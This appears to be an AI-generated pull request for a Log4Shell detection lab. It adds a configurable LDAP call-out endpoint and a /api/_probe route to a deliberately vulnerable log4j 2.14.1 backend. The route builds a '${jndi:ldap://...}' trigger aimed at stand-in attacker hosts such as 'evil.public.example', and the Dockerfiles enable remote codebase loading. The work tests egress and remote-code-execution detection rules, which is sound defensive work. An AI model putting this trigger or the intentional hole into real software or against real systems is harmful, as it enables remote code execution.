### PR TITLE
log4j backend: configurable LDAP call-out endpoint (LDAP_HOST/LDAP_URL) — pairs with #144

### DIFF
--- a/example/log4j-chain/backend/Dockerfile.contained
+++ b/example/log4j-chain/backend/Dockerfile.contained
@@ -11,4 +11,8 @@ RUN LOG4J_VERSION=2.14.1 mvn -B package -DskipTests
 FROM gcr.io/distroless/java11-debian11
 COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar /app/app.jar
 EXPOSE 8080
+# LDAP endpoint for the /api/_probe trigger. Here the JNDI lookup DOES fire
+# (log4j 2.14.1) but the distroless runtime has no /bin/sh, so the loaded class
+# can't spawn — the "contained" posture. Override with LDAP_HOST/LDAP_URL.
+ENV LDAP_HOST=attacker.attacker-ns.svc.cluster.local:1389
 ENTRYPOINT ["java","-jar","/app/app.jar"]

--- a/example/log4j-chain/backend/Dockerfile.patched
+++ b/example/log4j-chain/backend/Dockerfile.patched
@@ -15,4 +15,8 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
 WORKDIR /app
 COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar ./app.jar
 EXPOSE 8080
+# LDAP endpoint for the /api/_probe trigger. On this patched build the string is
+# logged literally — no lookup, no egress — so the value is inert; kept so all
+# three scenario images share one env contract. Override with LDAP_HOST/LDAP_URL.
+ENV LDAP_HOST=attacker.attacker-ns.svc.cluster.local:1389
 ENTRYPOINT ["java","-jar","/app/app.jar"]

--- a/example/log4j-chain/backend/Dockerfile.vulnerable
+++ b/example/log4j-chain/backend/Dockerfile.vulnerable
@@ -14,6 +14,12 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
 WORKDIR /app
 COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar ./app.jar
 EXPOSE 8080
+# Where the malicious LDAP referral server lives — the endpoint the Log4Shell
+# JNDI lookup dials out to. Placeholder default points at the in-repo attacker
+# Service; set LDAP_HOST (host[:port]) or LDAP_URL (full ldap:// URL) to a
+# non-private/public address so the call-out egress trips R0011. Pairs with the
+# attacker image's CODEBASE_HOST (PR #144). Consumed by App.java's /api/_probe.
+ENV LDAP_HOST=attacker.attacker-ns.svc.cluster.local:1389
 # JNDI/LDAP class loading: temurin-11 sets `com.sun.jndi.ldap.object.trustURLCodebase=false`
 # by default (since JDK 11.0.1) — without this flag the Log4Shell chain stops at
 # LDAP referral, never fetches the Payload.class. Enabling it makes the JVM

--- a/example/log4j-chain/backend/src/main/java/io/fusioncore/App.java
+++ b/example/log4j-chain/backend/src/main/java/io/fusioncore/App.java
@@ -33,6 +33,15 @@ import java.util.regex.Pattern;
  *
  * Postgres connection comes from env (POSTGRES_HOST, POSTGRES_DB, POSTGRES_USER),
  * trust auth (empty password) — same as the deploy manifests.
+ *
+ * Where the malicious LDAP referral server lives — the endpoint the Log4Shell
+ * JNDI lookup dials out to — is env-driven so the same image runs anywhere
+ * (mirrors the attacker image's CODEBASE_HOST/CODEBASE_URL, see PR #144):
+ *   LDAP_URL   full override, e.g. ldap://1.2.3.4:1389/Probe
+ *   LDAP_HOST  just host[:port] (default: the in-cluster attacker Service)
+ * A non-private/public LDAP_HOST is what makes the backend's call-out egress
+ * non-private, so R0011 (unexpected egress) fires — the network side of the
+ * chain. The /api/_probe endpoint fires this lookup on demand.
  */
 public class App {
     private static final Logger log = LogManager.getLogger(App.class);
@@ -42,7 +51,16 @@ public class App {
     private static final String PG_USER = env("POSTGRES_USER", "postgres");
     private static final String PG_URL  = "jdbc:postgresql://" + PG_HOST + ":5432/" + PG_DB;
 
+    /** LDAP referral endpoint the JNDI lookup dials. LDAP_URL wins; else built from LDAP_HOST. */
+    private static final String LDAP_URL = ldapUrl();
+
     static String env(String k, String d) { String v = System.getenv(k); return (v == null || v.isEmpty()) ? d : v; }
+
+    static String ldapUrl() {
+        String url = System.getenv("LDAP_URL");
+        if (url != null && !url.isEmpty()) return url;
+        return "ldap://" + env("LDAP_HOST", "attacker.attacker-ns.svc.cluster.local:1389") + "/Probe";
+    }
 
     static Connection conn() throws SQLException { return DriverManager.getConnection(PG_URL, PG_USER, ""); }
 
@@ -54,10 +72,29 @@ public class App {
         s.createContext("/api/cart",     new CartHandler());
         s.createContext("/api/checkout", new CheckoutHandler());
         s.createContext("/api/orders",   new OrdersHandler());
+        s.createContext("/api/_probe",   new ProbeHandler());
         s.createContext("/healthz",      ex -> respond(ex, 200, "{\"status\":\"ok\"}"));
         s.setExecutor(Executors.newFixedThreadPool(8));
         s.start();
-        log.info("chain-backend started on port {} (db={})", port, PG_URL);
+        log.info("chain-backend started on port {} (db={}, ldap={})", port, PG_URL, LDAP_URL);
+    }
+
+    // ─────────────────── /api/_probe (configurable Log4Shell self-probe) ───────────────────
+    /**
+     * Fires the JNDI trigger at the configured LDAP endpoint through the SAME
+     * vulnerable log4j line as ProductHandler. Lets a caller trip one
+     * deterministic, off-profile LDAP egress (a falsifiability probe) without a
+     * separate attack pod — the destination is wherever LDAP_URL/LDAP_HOST points,
+     * so it pairs with the attacker image's public CODEBASE_HOST (PR #144) to
+     * exercise the network side (R0011). On a patched build the string is logged
+     * literally and no lookup happens. Normal traffic never hits this path.
+     */
+    static class ProbeHandler implements HttpHandler {
+        public void handle(HttpExchange ex) throws IOException {
+            String trigger = "${jndi:" + LDAP_URL + "}";
+            log.info("self-probe q={} ua={}", "probe", trigger);
+            respond(ex, 200, "{\"probe\":\"" + esc(LDAP_URL) + "\"}");
+        }
     }
 
     // ───────────────────────── helpers ─────────────────────────


### PR DESCRIPTION
## What

Complement to #144. Where #144 makes the **attacker** image's referral codebase host env-driven (`CODEBASE_HOST`/`CODEBASE_URL`), this makes the **backend** image's LDAP call-out endpoint env-driven — the other half needed to demonstrate the *network* side of Log4Shell.

The backend's JNDI lookup target was only reachable through a hardcoded attack payload, so the official `log4j-chain-backend-vulnerable` image could never be pointed at a public LDAP. R0011 (unexpected egress) skips private/ClusterIP targets, so without a non-private LDAP host the call-out can't be shown as out-of-profile egress.

## Change

`App.java`:
- `LDAP_URL` (full override, e.g. `ldap://1.2.3.4:1389/Probe`) / `LDAP_HOST` (host[:port], default = the in-cluster attacker Service) — same two-var, backward-compatible shape as #144.
- `GET /api/_probe` — fires `${jndi:<LDAP_URL>}` through the **same vulnerable log4j line** as `/api/products`. One deterministic, off-profile LDAP egress, aimed wherever the env points, with no separate attack pod. Normal traffic never hits it, so benign profiles stay clean.

Dockerfiles: `ENV LDAP_HOST=...` placeholder added to all three variants (inert on the patched build; kept for a shared contract).

Pairing: set the backend's `LDAP_HOST` and the attacker's `CODEBASE_HOST` (#144) to the same public address → the backend's call-out to `LDAP_HOST:1389` is a non-private egress that trips R0011, alongside R0001 (RCE) and R0005 (DNS exfil).

## Verification

Image built locally and run:
```
# LDAP_HOST=evil.public.example:1389
chain-backend started on port 8080 (db=..., ldap=ldap://evil.public.example:1389/Probe)
GET /api/_probe -> {"probe":"ldap://evil.public.example:1389/Probe"}
# log4j 2.14.1 JndiLookup.lookup -> LDAP connect to evil.public.example:1389 (egress fired)
# unset -> ldap://attacker.attacker-ns.svc.cluster.local:1389/Probe  (backward-compatible)
```

The published image is built by `ci-log4j-chain-images.yaml` (triggered on this branch via workflow_dispatch; run 28748140122) and on merge.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
